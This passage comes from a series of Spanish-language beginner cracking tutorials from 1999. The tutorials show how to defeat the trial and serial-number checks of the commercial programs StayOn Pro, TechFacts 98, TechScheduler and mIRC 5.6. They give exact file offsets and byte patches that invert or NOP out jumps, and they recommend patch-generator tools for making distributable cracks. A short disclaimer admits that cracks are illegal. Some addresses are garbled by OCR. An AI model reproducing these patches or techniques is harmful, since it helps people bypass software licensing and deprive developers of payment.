Vamos a Crear una Carpeta nueva con el nombre que queráis y hacemos una copia del programa, 
ahora procedamos a desensamblar el ejecutable StayOn Pro.exe y abrimos con el editor HEX la 


copia que hemos hecho dentro de la nueva carpeta. 


Por donde empezar no tenemos mensajes de error al intentar registrarnos ni nada que nos 
avise de que nos queda un día menos, que hacemos !! acordaros de lo que hicimos en el 
proyecto anterior busquemos cadenas de texto como Expired, Thank You for registering o 
similares, para mirar que Cadenas de texto hay en el programa cliqueamos con el ratón el 
botón [Strn-Ref] y se nos habre una ventana con todas los textos les echamos un vistazo 
detenidamente y empezamos a ver cosas interesantes un EXPIRED, Thak you for Registering, 


This Program has Expired. 


Creo que la mas interesante de todas es la que nos felicita por registrarnos ósea que 
hacemos un doble clip en Thank You for Registering y aparecemos en 


* Posible StringData Ref from Data Obj -> "Thank You For registering StayOn pro " 


:0040430D 6800A34300 push 0043A300 


:00404312 E8C7E80100 CALL 00424690 


Y si hacemos nuebamente doble clip la misma frase aparecemos en: 


* Posible StringData Ref from Data Obj -> "Thank You For registering StayOn pro " 


:00405dbf 6800A34300 push 0043A300 


:00405DC4 E8C7E80100 CALL 00424690 


Siempre tenemos que comprobar cuantas referencias a la frase que buscamos hay en el código 
en este caso tenemos dos, si miramos alrededor de la primera vemos que en 004042EF tenemos 
un salto a 00404317 y si miramos en la segunda referencia vemos QUE en 00405DA4 tenemos otro 
salto a 00405dc9 las dos referencias con sus dos saltos parecen similares solo que en 
distintas direcciones de memoria, pero fijémonos detenidamente, en la primera referencia el 
salto que hemos visto no parece que venga ni valla a las rutinas de comprobacion del n/s por 
lo general la parte del código donde se comprueba el numero de registro suele ser complicado 


lleno de llamadas, comprobaciones, asignaciones de valores, saltos etc. y esta primera 
referencia no creo que sea la adecuada, (Esto lo veríamos muy claro utilizando un debug como 
es el soft-ice, pero por ahora no utilizaremos debug nos centraremos en listados muertos)así 
que de momento nos vamos a olvidar de la primera referencia y nos vamos a la segunda. 


Vamos al salto que tenemos en 00405DA4 7423 je 00405DC9 YO creo que lo que hace este salto 
es lo siguiente, al meter un n/s para registrarnos salta a la dirección que indica donde 
parece estar las rutinas de comprobación, hace las comprobaciones si hemos hacertado nos 
envía directamente al Thank you for .... y si no acertamos el programa sigue su ejecución 
normal en evaluación, pero que pasaría si suprimimos ese salto para que al meter un n/s 
cualquiera no haga ninguna comprobación, probamos..? miramos la dirección que marca el 
offset al hacer clip sobre el salto en cuestión, miramos en la barra de estado de el W32dasm 
y vemos esta dirección 00005DA4h como ya teníamos el editor Hex abierto y con una copia del 
programa, buscamos esa misma dirección, como ya comente anteriormente la [h] de la dirección 
del offset no nos sirve para nada ósea que buscamos esta dirección sin la [h] en el editor 
HEX, tenemos que llamar a la direccion del offset 5DA4 y nos lleva a FFFF 84C0 7423 6A01 
8BCF 5850 los números que he marcado en rojo estos numeros son los que definen el tipo de 
salto y su direccion de memoria para eliminar el salto que nos interesa cambiamos 7423 por 


9090 y esto quedaría así 


00405da4 “7423 je 00405dc9 --- el salto original tenemos que cambiar dos Bytes el 74 y el 23 


00405da4 90 nop----=-=-=-=-= | 


00405da5 90 nop | y el salto eliminado un byte, asignado a Cada linea 


ahora solo nos queda salvar los cambios y probar ( se entiende que debemos ejecutar la copia 
que hemos hecho no el original, ya que los cambios los hemos hecho en la copia) bien 
funciona nos acepta cualquier n/s que metamos y si después ejecutamos el original también 
funciona ósea que el registro del programa se queda validado en el system.dat de Windows. 


Espero que lo entendáis y que practiquéis ya que cuesta la hostia hacer un manual de estos 
es posible que las rutinas no funcionen como las he intentado explicar ya que no soy ningún 
experto, pero en cualquier caso el crack funciona, podéis mandar vuestros comentarios sobre 
estos manuales o vuestras sugerencias, criticas etc. 


75 = jne 
74 = Je 

eb = jmp 
90 = nop 


leer esto de abajo... 


Este material es solo para uso educativo, por ahora los cracks son ilegales. 


Email Kf_karpoffGhotmail.com 


URL: http://welcome.to/karpoff http://members.xoom.com/kf karpoff 


informacion en Castellano, 


Karpoff Spanish Tutor: Pagina dedicada a la dibulgacion de 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Programa: TechFacts 98 V2.33 


PROTECCION: Trial 30 dias, Name / Serial 


Descripcion: Excelente herramienta para spyar cualquier proceso de nuestra maquina 


Dificultad: MR 


DOWNLOAD : http://www.winutils.com/tekfct98.htm 


Herramientas: W32Dasm « Editor Hexadecimal 
CRACKER: karpoff FECHA: 14/08/99 


INTRODUCCION 


Hi Tutorial de Crackeo Para Newbies desde Cero 14/08/99 


PROYECTO 3 Por Karpoff 


TechFacts 98 V2.33 


Hola nuevamente!! Un saludo para todos los que seguís esta serie de Manuales Para 
Newbies desde Cero, (Hola Búho se que estas ahí J] ). 


El programa que he escogido hoy puede sernos de gran ayuda a la hora de seguir 
procesos de ejecución de las librerías de cualquier programa que estemos ejecutando, 
es una herramienta mas para nosotros. Podéis cojerlo de 


http://www.winutils.com/tekfct98.htm 


Este Programa nos da 30 días para Evaluarlo, Pasado ese tiempo no se lo que ocurre. 
al ejecutarlo nos muestra una pantalla super llamativa con dibujitos de tarjetas de 
crédito ( es horrible ). 


Acudiendo a Help About nos da la opción de meter un N/S para registrarlo 


Ataques, Localizar la rutina que se encarga de verificar si el n/s que hemos metido 
es correcto y manipularla para nuestro beneficio, o bien eliminarla si es posible, 
también podemos localizar el punto exacto donde compara nuestro n/s con el verdadero 
y Capturar el verdadero, 


Como en los manuales anteriores optaremos por la primera ya que podemos localizar la 
parte del código que nos interesa con un listado muerto ( Programa desensamblado que 
se puede acceder a cualquier parte del código sin necesidad de estar ejecutando el 


programa ) que es lo que nos mostrara el W32Dasm cuando desensamblemos el ejecutabl 


Herramientas las de siempre el W32Dasm y un Editor Hexadecimal el que mas os guste en 
mi caso utilizare el Workshop32. 


| AL ATAKE 


Empezamos lo Primero hacer una copia del Ejecutable para poder aplicar los cambios cuando 
localicemos los Bytes a manipular, en la misma carpeta donde hemos instalado el programa 
podemos hacer una copia de Tekfct98.exe con el nombre que queramos por ejemplo Crack98.exe o 
podemos crear una carpeta nueva y copiar todos los archivos de una a otra. ( lo de copiar 
todos los archivos es porque si copiamos el ejecutable solo no funcionara ya que utiliza 
alguna librería propia como Tekwatch.dll etc. ) Ejecutamos el W32Dasm y desensamblamos 
Tekfct98.exe seguidamente editamos con el HEX la copia del ejecutable. 


Vamos a ver como se comporta el programa cuando intentamos registrarnos, ejecutamos vamos a 
help, about enter key register y rellenamos con los datos que queramos aceptamos y como era 
de esperar una ventanita que nos dice que la hemos cagado ( Registration Key Failed ) para 
nosotros es una buena respuesta ya que por ahí le atacaremos, vamos al W32Dasm e intentamos 
localizar la cadena de texto que nos ha contestado, para ello ya sabéis pulsar [Strn-Ref] se 
abré la ventana con todas las cadenas de texto que utiliza el programa para comunicarnos lo 
que sea y la buscamos, una vez localizada hacemos doble clip ya de paso fijaros que justo 
encima hay una frase que nos daría el aviso si nos hubiese aceptado el n/s esto me sugiere 
que no vamos a tener ningún problema para petar este programa, bueno íbamos por hacemos 


doble clip en la frase y saltamos de inmediato a: 


e Posible StringData Ref From Code Obj ->"Registration Key Failed!" 


:0047999E B8089B4700 mov eax, 00479B08 


:004799A3 E81C8EFCFF CALL 004427C4 


Os recuerdo que siempre debemos comprobar si hay mas llamadas de otra parte del código a 
esta frase ósea que volvemos a clicear otra vez sobre la frase, en este caso no hay mas. 
Bueno pensemos para que se imprima este mensaje el programa ha tenido que hacer alguna 
llamada o algo así a esta parte del código, hechemos un vistazo, y Justo encima vemos lo 
contrario la referencia a la frase Registration Key Acceptedque bonito suena esto, yo al ver 
que están tan cerca una frase de la otra lo único que pienso es que la parte del código que 
hace que se activen estos mensajes tiene que ser sencilla del tipo una sola comprobación si 
el n/s es correcto el código se sigue ejecutando si es incorrecto salto al mensaje de error 
o viceversa ósea que todo queda resumido a un salto después de una comprobación, pues 
busquemos por encima de los mensajes, vemos enseguida dos saltos juntos que son 


:0047997C E9CBIDFSFF jmp 0040374C 


:00479981 EBFO Jmp 00479973 


pero fíjaros en las direcciones de los dos saltos, los dos saltan pase lo que pase hacia 
arriba de los mensajes, yo buscaría un salto que viniese de arriba y que según el valor que 
lleve pueda imprimir un mensaje o el otro ósea que si falla se saltara el mensaje de Reg Key 
accepted pero no el de Reg Key Failed y si el N/S es correcto se encontrara con Reg Key 
accepted sin llegar a Reg Key Failed , no se si lo entendéis... ( Esta es la manera en la 
que yo creo que funciona el programa, mis conocimientos de ASM son Cero Patatero ) entonces 
busquemos el salto con las características explicadas miramos hacia arriba seguimos subiendo 


mas mas mas mas y en 


:00479881 E832A0F8FF CALL 004040B8 ---- Rutina de comprobación 


:00479886 0F850B010000 jne 00479997 -----— Este es 


:0047988c 8D45E8 lea eax, dword ptr [ebp-18] 


Lo veis ??? si el salto se ejecuta salta encima del mensaje de no reg pero ya se ha pasado 
el de si regósea que lo único que nos puede mostrar es lo que nos mostró cuando intentamos 
registrarnos anteriormente, solo nos queda cambiarlo para que no salte. 


Si os fijáis este salto es distinto a los que hemos visto los otros manuales 


74 = je 
75 = jne 
eb = jmp 


el funcionamiento es el mismo, la codificacion hexadecimal depende de la direccion de 
memoria a la que apunte el salto, cuanto mas lejos mas bytes ocupara, los cambios son 


OF84xXxxxxx = Je 
OF85XXXXXX = jne 
E?XXXXXXXX = Jmp 


Osea que si el salto era 00479886 0F850B010000 JNE 00479997 


Lo cambiamos por 00479886 0F840B010000 JE 00479997 


Para hacer los cambios vamos al editor Hex , os habéis fijado en la dirección del offset??, 
os acordáis como localizarla?? Lo repito en la barra de estado del W32Dasm tenemos barios 
datos entre ellos uno que pone ROffset siempre que tengáis que hacer algún cambio a un 
programa tendréis que fijaros en la dirección que marca el Offset, para luego poder 
localizarlo en el HEXedit. Pinchamos con el ratón la línea del salto, y se ilumina con color 
verde ahora podemos ver la dirección que marca el Offset que en este Caso es 00078C86h, 
vamos el editor seleccionamos la opción Goto (llamar) y metemos la dirección, no hace falta 
poner los ceros y la [h] del final no se pone ósea que 78c86 aceptamos y nos lleva a ECE8 
32A8 F8FF 0F84 0B01 0000 8D45 E8BA En rojo nuestro código y en resaltado el cambio que ha 
sido 85 por 84 ya solo nos que salvarlo y ejecutarlo realizamos la operación de registro y 
Conseguido..... estamos registrados !!!, Incluso si ejecutamos el ejecutable original ahora 
también nos sale como registrado y es que este es otro programa que guarda los datos en 
SYSTEM.dat ( el registro de Windows ). 


Como de costumbre espero que lo entendáis y que os sea de utilidad. 


Un Saludo a TODOS. (Karpoff) 


Este material es solo para uso educativo, por ahora los cracks son ilegales. 
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INTRODUCCION 


HH Tutorial de Crackeo Para Newbies desde Cero 15/08/99 


Por Karpoff PROYECTO 4 


TechScheduler V 2.70 


Hola nuevamente !! Un saludo para todos los que seguís esta serie de Manuales Para 
Newbies desde Cero, (Hola Búho Otro mas J ). 


Y ya estamos en el Cuarto Proyecto, Me gustaría recordaros las tácticas que hemos ido 
utilizando ósea la forma en que debemos pensar cuando nos enfrentamos a un nuevo 
reto. Siempre observar detenidamente como actúa el programa al ejecutarse , al 
intentar Registrarnos , Cuando Expira el programa Etc. Yo suelo coger una hoja en 
Blanco para cada nuevo proyecto y voy apuntando todos los avisos que nos pueda dar, 
Esto nos sirve mucho mas de lo que podáis pensar, si ya tenéis experiencia en petar 
otros programas comparar como actúan unos y como actúan otros, ejemplo programas de 
la misma empresa, por lo general todos llevara el mismo tipo de protección entonces 
si recordáis o si apuntasteis como crackeais un programa solo tenéis que seguir los 
mismos pasos creerme que os facilitara mucho trabajo. 


Por ahora solo hemos trabajado con listados muertos, los ataques han sido localizar 
las rutinas que comprueban el tiempo que nos queda de evaluación, rutinas que 


comprueban si hemos metido el N/S correcto y manipularlas, invertirlas o eliminarlas. 
Hemos podido acceder a estas rutinas gracias al W32Dasm y buscando los mensajes que 
nos han dado los programas cuando hemos intentado registrarnos o a través de los 
datos de evaluación como, "nos quedan 28 días de evaluación "o similares, Localizados 
los avisos hemos investigado que parte del código se ha encargado de activar los 
mensajes, como habéis visto siempre ha habido una rutina de comprobación seguida de 
un salto que según el valor que da la rutina que se encarga de comprobar salta o no 
salta. 


Bueno pues el Programa que hoy os invito a estudiar esta basado en el mismo tipo de 
protección, si os fijáis pertenece a la misma empresa que el que estudiamos en el 
tutorial N* 3, recordar lo que os he dicho antes sobre los programas de la misma 
empresa etc. Me gustaría que probarais a petarlo sin la ayuda del manual digamos como 
un ejercicio.Por que creo que si habéis seguido los manuales anteriores no vais a 
tener ningún problema. Este va ha ser el ultimo manual que trate de este tipo de 
protecciones, En el siguiente empezaremos a utilizar el Soft-Ice intentaremos 
localizar un N/S Correcto para un programa en concreto que todavía no lo he 


decidido. 


Así que animo y suerte. El programa esta en: 


http://www.winutils.com/techsche.htm TechScheduler V 2.70 


| AL ATAKE 


Este Programa nos da 30 días para Evaluarlo, Pasado ese tiempo no se lo que pasa al 
ejecutarlo nos muestra una llamativa Pantalla amarilla recordándonos que estamos en 


evaluación. 


Si pulsamos en Window about Use Reg Key nos da la opción de registrar el programa. 


Ataques, Localizar la rutina que se encarga de verificar si el n/s que hemos metido es 
correcto y manipularla para nuestro beneficio, o bien eliminarla si es posible, también 
podemos localizar el punto exacto donde compara nuestro n/s con el verdadero y capturar el 
verdadero pero Como en los manuales anteriores optaremos por la primera ya que podemos 
localizar la parte del código que nos interesa con un listado muerto que es lo que nos 
mostrara el W32Dasm cuando desensamblemos el ejecutable. 


Herramientas las de siempre el W32Dasm y un Editor Hexadecimal el que mas os guste en mi 
caso utiizare el Workshop32. 


Empezamos lo Primero es hacer una copia del Ejecutable para poder aplicar los cambios con el 
HexEdit cuando localicemos los Bytes a manipular, en la misma carpeta donde hemos instalado 
el programa podemos hacer la copia de Teksched.exe con el nombre que queramos, por ejemplo 
Crack98.exe o podemos crear una Carpeta nueva y copiar todos los archivos de una a otra. ( 
lo de copiar todos los archivos es porque si copiamos el ejecutable solo es posible que 


funcionase ya que puede utilizar alguna librería propia) 


Ejecutamos el W32Dasm y desensamblamos Teksched.exe seguidamente editamos con el HEX la 


copia del ejecutable. 


Vamos a ver como se comporta el programa cuando intentamos registrarnos, lo ejecutamos vamos 
a Window, about Use Reg Key y rellenamos con los datos que queramos, aceptamos y como era de 
esperar una ventanita que nos dice que la hemos cagado ( Registration Key Failed ) para 
nosotros es lo mejor que podía ocurrir ya que ahora sabemos por donde le atacaremos. 


vamos al W32Dasm e intentamos localizar la cadena de texto que nos ha contestado, para ello 
ya sabéis pulsar [Strn-Ref] se Habré la ventana con todas las cadenas de texto que utiiza el 
programa para comunicarnos lo que sea y la buscamos, una vez localizada hacemos doble clip 
en la frase y saltamos de inmediato a: 


Posible StringData Ref From Code Obj + "Registration Key Failed!" 


:004792AD B88C944700 mov eax,0047948C 


:004792B2 E81DE6FDFF CALL 004578D4 


Como siempre Cliqueamos nuevamente en la misma frase para ver si hay mas llamadas de otra 
parte del código a esta frase , en este Caso no hay mas. Bueno pensemos para que se imprima 
este mensaje el programa ha tenido que hacer alguna llamada o algo así a esta parte del 
código, echemos un vistazo, y justo encima vemos lo contrario la referencia a la frase 
Registration Key Accepted que bonito suena esto, yo al ver que están tan cerca una frase de 
la otra lo único que pienso es que la parte del código que hace que se activen estos 
mensajes tiene que ser sencilla del tipo una sola comprobación si el n/s es correcto el 
código se sigue ejecutando si es incorrecto salto al mensaje de error o viceversa ósea que 
todo queda resumido a un salto después de una comprobación, pues busquemos por encima de los 
mensajes vemos enseguida dos saltos a 004792b7, Fijaos bien y analizar que puede ocurrir si 
se activan estos saltos, ya?? Bueno yo Observo que dada la dirección a la que apuntan nos 
podrían mostrar el mensaje de Registration Key Failedsi el salto no se ejecuta y si se 
ejecuta el salto se pasaría dicho mensaje, pero en cualquier caso nunca llegarían al mensaje 
de Registration Key Accepted no?? Osea que no es lo que buscamos, Recordad que 
Características tendría que tener el salto que buscamos, debería de estar en una dirección 
de memoria que si metemos el n/s correcto pueda mostrar el mensaje Registration Key Accepted 
, y si fallamos pueda llegar a Registration Key Failed ósea que la dirección de memoria a la 
que apunte el salto nunca debe de pasar de 004792A8 (Aquí esta el mensaje de error) y tiene 


que estar situado antes de 0047928A Para que pueda imprimir Registration Key Accepted. 


Como siempre digo esta es la forma en que yo pienso que puede funcionar el programa, aunque 
se que hay programas tan enrrevesados que esta teoría no nos serviría de nada. 


Aclarado esto continuamos. Mirar que salto tenemos en 0047928A 


Podría tener las características que buscamos noo? 


0047928A 750A jne 00479296 


Possible StringData Ref from Code Obj -->"Registration Key accepted!" 


:0047928C B868944700 mov eax, 00479468 


:00479291 E83EE6FDFF call 004578D4 


Reerenced by a (U)nconditional or ( C)onditional Jump at Address: 


:0047928A( C) 


:00479296 A1E0F35100 mov eax, dword ptr [0051F3E0]--- salta aqui 


:0047929B C60000 mov byte ptr [eax], 00 


:0047929E EB17 jmp 004792B7 -——Lleve el valor que lleve salta 


Esta antes de Registration Key accepted y si salta no pasa de 004792A8 que es donde esta 
Registration Key Failed Observemos lo que hace, según el valor que reciba este salto saltara 
o no, si no salta nos mostraría el mensaje de Registration Key accepted y si salta caerá en 
00479296, si cae aquí, antes de llegar a Registration Key Failed se va ha encontrar con otro 
salto en 0047929E y este tipo de saltos son saltos incondicionales que saltan tenga el valor 
que tenga ( jmp ), entonces como sabemos que de todas todas va ha saltar miremos donde cae, 
ohhh se ha saltado el mensaje de Registration Key Failed por lo tanto este tampoco es lo que 


buscamos, 


Bueno pues sigamos buscando por ahí arriba, vemos otro par de saltos que no tienen las 
Características que buscamos (igual no existe lo que buscamos y tenemos que pensar en otra 
cosa L ) sigamos para arriba mas y mas mas mas y alto aquí hay uno que parece que tiene lo 
que buscamos. 


:0074916A 0F8530010000 jne 004792A0 


como veis si el salto no se ejecuta puede llegar Registration Key accepted ,y si se ejecuta 
ósea salta va directo a Registration Key Failed ,Pues sin probarlo os aseguro que es este, 
tenemos que modificarlo para que no salte o inutilizarlo que seria lo mismo. 


Lo primero localizar la dirección del Offset, no diré como se hace porque ya lo sabéis. 
Corremos hacia el Editor HEX que lo tenemos abierto con una copia de Teksched.exe y buscamos 


la dirección de Offset 7856A y nos mostrara esto. 


8B55 E0E8 16B1 F8FF 0F85 3001 0000 


En rojo el salto definido en HEXADECIMAL y en rojo resaltado el cambio que tenemos que hacer 


8B55 E0E8 16B1 F8FF 0F84 3001 0000 Nos quedara así. También podemos inutilizar el salto 
sustituyendo la cadena en hexadecimal por 90s 


8B55 E0E8 16B1 F8FF 9090 9090 9090 Que nos quedaría Así. Esto es como si no existiría el 
salto, yo no he probado si funciona pero supongo que si. 


En cualquier caso salváis los cambios y probáis a registrarlo, bienn!!! nos acepta el numero 
que metamos lo hemos conseguido ;-) 


Como en los anteriores una vez que os acepte el n/s podéis eliminar la copia del ejecutable 
y utilizar el original, ya que los datos quedan en el registro de windows, y si eliminamos 
la copia en realidad no estamos utilizando un programa crackeado, ya que el ejecutable no 
esta modificado ]) 


En los anteriores manuales no lo he comentado pero conviene hacer el crack y guardarlo, 
quizás nos pueda hacer falta en un futuro. Para los que no sabemos programar tenemos un 
montón de creacracks, estos son programas que comparan el ejecutable original con el que 
hemos partcheado y crea un ejecutable con los datos que obtiene, tenemos muchos donde 
escoger pero recomiendo escoger uno haga los ejecutables pequeños, en mi pagina web 
encontrareis los dos que creo que son mejores uno el el CrackMaker , este genera los 


ejecutables no superiores a 10 o 15 KB y el otro es el RTD_pather este funciona en MS/DOS y 
puede crear el crack en código fuente del lenguaje que queramos la sintaxis es la siguiente 


C:>RID_PT20.EXE [ARCHIVO ORIGINAL] [ARCHIVO CRACKEADO] /OPCION 


LAS OPCIONES SON / P PARA PASCAL 


/ C PARA C 

/ A PARA ASM 

/ X PARA UN EJECUTABLE .COM 

/ D PARA UN ARCHIVO CON LOS DATOS 

ESTE CREAPATCHES ES MUY UTIL, PARA APRENDER COMO HACER LOS CRACK. 

Cuando hagáis un crack nunca le deis el mismo nombre que el del archivo a crackear ya que no 
puede haber dos archivos con el mismo nombre en el mismo directorio. 


Como siempre os obligo a que lo entendáis. (os recuerdo que el siguiente proyecto que tengo 
pensado hacer necesitaremos el Soft-Ice V4. En la Web encontrareis info sobre donde 
localizarlo, Instalaion Etc. No dejéis de practicar 


Un Saludo a TODOS/AS. (Karpoff) 


Este material es solo para uso educativo, por ahora los cracks son ilegales. 
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Programa: mIRC 32 V5.6 Win9x 


PROTECCION: Name / Serial 


Descripcion: Programa de comunicacon en canales de Internet 


Dificultad: RO 


DOWNLOAD : 


http://www.irc-scripts.com/files/mircS6t.exe 


Herramientas: W32Dasm , Editor Hexadecimal 
CRACKER: karpoff FECHA: 28/08/99 


INTRODUCCION 


Hi Tutoríal de Crackeo Para Newbies desde Cero 28/08/99 


Por Karpoff it PROYECTO 7 ¿Hit 


mIRC 32 V5.6 Win9x 


Bueno Holaaa otra vez ¡¡!¡ , Que tal os va ¿? Hoy os presento el proyecto 7 de esta 
serie de manuales para Newbies desde cero, y parece que muchos de vosotros os 
resistís a pasar al SoftlIce, ( Antxon, Tauro, Lisa2, y algunos mas ) he recibido 


vuestros Email con sugerencias y preguntas, prometo responderos a todas/os, aunque 
quizás tarde un poco, como siempre os digo que le metáis caña al Softlce. el programa 
que tenemos hoy es el conocido mIRC en su ultima versión V5.6, supongo que tenéis 
preferencia por la versión en castellano no ¿? Pero lo haré con la de ingles así lo 
haréis un poco mas interesante, ya que los pasos son los mismos pero obviamente 
cambian las direcciones de memoria y quizás alguna otra cosa. 


Podéis bajaros el programa de: 


http://www.irc-scripts.com/files/mirc56t.exe 


y el ejecutable en castellano lo tenéis en http://shareware.intercom.es 


en la sección Internet- comunicaciones y Chat. 


AL ATAKE 


El programa nos da una evaluación de 30 idas, al iniciarlo nos muestra un Nagscreen con la 
foto del nota diciéndonos que hagamos el reg. Pasada la evaluación nos invaden molestas 
pantallas mientras lo intentamos utilizar. 


Ataques ya que utilizaremos el W32dasm, localizar la rutina que comprueba si el registro que 
metemos es correcto o no, y manipularla en nuestro beneficio o eliminarla. 


Herramientas, W32Dasm y un editor Hex. 


Lo primero hacer una copia del ejecutable mirc32.exe, editar esta con el HexEdit y 
desensamblar el original. 


Ejecutamos el mIRC para intentar registrarlo y ver como actua, una vez metido el reg que 
queramos, nos dice que no hay bisnis no cuela ("Sorry, your registration name and number 
don't match! ) así que a partir de este mensaje invertiremos la ejecución del programa para 
ver donde tomo la decisión de mostrar este aviso y no otro, vamos al W32Dasm y pulsamos el 
botón [ str-ref ] y nos mostrara todas las cadenas de texto que el Dasm interprete como tal. 


Busquemos la frasecita "Sorry, your registration name and number don't match! en la ventana 
que se ha abierto, y enseguida la vemos, y justo encima vemos el texto que hace referencia a 
que nos hemos registrado correctamente (Your registration has been entered successfully ), 
bien bien bien... vamos por muy buen camino, pensemos como podemos atacar, parece que este 
programa es el típico que el programador no se ha tomado ninguna molestia en protegerlo, yo 
pienso si tengo el mensaje de registro fallido y también tengo el de registro aceptado, lo 
primero que me viene a la cabeza es un salto del tipo je o jne que según el valor que reciba 
de una comprobación salta a un mensaje o no salta y se sigue ejecutando, [ aunque no todo 
suele ser tan sencillo ) bueno ya bale de pensar y al grano, doble clip en Sorry, your 
registration name and number don't match y cliqueamos nuevamente por si hubiese mas de una 
referencia a esta Cadena, en este caso solo hay una que es en: 


* Possible Reference to String Resource ID=01913:"Sorry, your registration name and number 
don't match! Pleas" 


:004395C0 6879070000 push 00000779 ----- Aquí aparecemos 


:004395C5 E8DE13FDFF call 0040A9A8 


:004395CA 50 push eax 


:004395CB 8B4508 mov eax, dword ptr [ebp+08] 


:004395CE 50 push eax 


hemos dicho que podía haber un salto con unas características determinadas no ¿7? Pues a 
buscarlo, miraremos hacia arriba, porque lo normal es que primero se ejecuta el salto y 
luego se imprime el aviso, ósea que la dirección de memoria donde se encuentre el salto será 
anterior a el aviso de error ( aunque no siempre es así ) 


Y enseguida nos encontramos con el primer salto. 


* Reference To: USER32.MessageBoxA, Ord:0000h 


:0043956B E852C40900 Call 004D59C2 


:00439570 B801000000 mov eax, 00000001 


:00439575 E9C0000000 jmp 0043963A 


Pero observarlo bien primero, es un salto incondicional que saltara lleve el valor que 
lleve, y si os fijáis en la dirección a la que va ha saltar 0043963A ya veis no ¿? Jamas nos 
llegaría a nuestro mensaje de error, aclaro que este jmp podría saltar a una parte del 
código que mediante llamadas (call) enrevesadas podría retornar por encima del mensaje de 
error y acabar llegando a el, pero yo opto por seguir buscado el salto con las 
Características que nos interesan, de no encontrarlo volveríamos a este y lo seguiríamos, 
queda claro lo que intento explicar ¿? Sigamos hacia arriba, mirar por de pronto encontramos 
el aviso Your registration has been entered successfully, 


* Possible Reference to String Resource ID=01911: "Your registration has been entered 
successfully.Thanks for" 


:0043955C 6877070000 push 00000777 


:00439561 E84214FDFF call 0040A9A8 


:00439566 50 push eax 


:00439567 8B4D08 mov ecx, dword ptr [ebp+08] 


:0043956A 51 push ecx 


que.. esto debería alegrarnos, ya que parece que va ha ser el típico salto que hemos 
explicado, ousease si el reg es correcto no salta y se encuentra con el mensaje way, que el 
reg no es correcto salta pasando el mensaje way, y se para antes de llegar al mensaje 
maldito, lo cogéis si verdad ¿? J pues sigamos buscando..... huyyuyui que no aparece L 

PI Hombreeee aquí aparece uno veamos sus Características. 


* Reference To: USER32.SendDlgltemMessageA, Ord:0000h 


:004394C3 E848C50900 Call 004D5A10 


:004394C8 68CB544E00 push 004E54CB 


:004394CD 68E4504E00 push 004E50E4 


:004394D2 E8DD370600 call 0049CCB4 


:004394D7 85C0 test eax, eax 


:004394D9 0F849B000000 je 0043957A á nuestro salto 


y tenemos en 004394d2 un call que le pasa un valor 0 o 1l a Test y este según el valor que le 
asignen ara que je salte a 00439574 o continúe ejecutándose, veis la dirección a la que 
apunta el salto, si decide no saltar llegara a el mensaje way, pero si decide saltar pasara 
por encima del mensaje way pero no del mensaje maldito, ósea que nos interesa que no se 
ejecute el salto, bueno pues podemos inutilizarlo (90 = nop ) o convertirlo en un salto 
incondicional ( eb = jmp o E? = Jmp )que salte justo a la línea siguiente, lo que queráis yo 
recomiendo la primera eliminarlo, ósea que vamos al Editor Hex que lo teníamos abierto y con 
una copia del ejecutable editada, y metemos la dirección del offset que tiene el salto, 
(sabéis como encontrarla no¿? sino lo los sabéis mirar manuales 1 y 2 ) ousease Goto 38ad9 y 
si hemos decidido anular el salto, cambiamos 


0r84 B000 0000 POR 9090 9090 9090 9090 


Salvamos los cambios y a probar, nuevamente intentamos registrar el programa y esta vez si 
nos acepta el registro, miramos en el about y va apareciendo nuestro nombre, pues ya esta. 


OHHH n00000000 ¡!!!! Cerrar el mIRC y volver a ejecutarlo, el registro no se mantiene, hemos 
pasado algo por alto, a de haber otra comprobación ( esto suele ser muy típico con el método 


que estamos utilizando ) bueno volvamos al salto manipulado y estudiemos que pasa, lo 
primero que hemos visto es que una llamada (call) venia con un valor de 0 o 1 para eax y 
esto determinaba si se ejecutaba el salto o no, bueno pues sigamos la llamada call 0049ccb4 
y veamos que hace, nos posamos sobre ella y pulsamos el botón [call] que nos lleva a: 


:0049CCB4 55 push ebp á aterrizamos aqui 


:0049CCB5 B8BEC mov ebp, esp 


:0049CCB7 53 push ebx 


:0049CCB8 56 push esi 


:0049CCB9 57 push edi 


:0049CCBA 8B750C mov esi, dword ptr [ebp+0C] 


:0049CCBD 8B5D08 mov ebx, dword ptr [ebp+08] 


:0049CCC0 53 push ebx 


:0049CCC1 E8A6C00200 call 004C8D6C 


:0049CCC6 59 pop ecx 


:0049CCC7 83F805 cmp eax, 00000005 


:0049CCCA 7304 3jnb 0049CCDO 


:0049CCCC 33C0 xor eax, eax 


:0049CCCE EB5C jmp 0049CD2C 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0049CCCA (C) 
:0049CCD0O 56 push esi 


:0049CCD1 53 push ebx 


:0049CCD2 EBSFDFEFFFF call 0049CBD4 


:0049CCD7 85C0 test eax, eax 


:0049CCD9 7407 Je 0049CCE2 


:0049CCDB B801000000 mov eax, 00000001 


:0049CCE0 EB4A Jjmp 0049CD2C 


Bueno vemos algunos Push que colocan un determinado valor en la pila una comparación (cmp) 
eax = 5 que hará que si jnb no salta iremos al final de la llamada que estamos examinando 
que es call 0049ccb4, que en estos momentos estamos dentro de ella y que si vamos al final 
de la llamada no hacemos nada porque no ha efectuado ninguna comprobacion del tipo que 
necesitamos, fijaros que en 0049CCD2 empieza un call este trae un valor 001, este 0o 1 
depende de si el reg que metemos es valido o no y pone a eax a 0 o 1, según el valor saltara 
o no, como podéis ver es el mismo proceso que seguía nuestra primera comprobación, así que 
probemos a anular el salto, ([ os recomiendo que sigáis todo el proceso con el softice, de esa 
manera sabréis que hace el salto de 0049CCD9 7407 je 0049CCE2 


Lo que intento decir es que con el listado muerto no hay manera de saber si lo bueno es que 
se ejecute el salto o viceversa , con el soft no tendríamos que probar al azar.) 


Bueno pues vamos al editor HEX y llamamos al offset del salto que tenemos que anular GOTO 
9C2D9 Y CAMBIAMOS. 


7407 POR 9090 y con esto hemos anulado el salto, ahora probamos otra vez a registrar el 
mIRC, metemos los datos, y como era lógico nos los acepta, nos queda comprobar si se 
mantiene el registro, ósea que cerramos abrimos nuevamente vamos a 


help y de entrada ya tenemos una buena señal no esta la opción para registrarnos, y mirando 
en about hay están nuestros datos, (objetivo conseguido) 


NOTA este crack no es como el de los primeros manuales, que los datos del reg se guardaban 
en el registro de Windows, y esto nos permitía utilizar el ejecutable original en vez del 

ejecutable patcheado, en este caso si queréis utilizar mIRC debéis utilizar el ejecutable 

crackeado, por eso os recomiendo que generéis el crack ok, 


Como siempre espero que todo este claro y que disfrutéis con estos manuales, que al fin y al 
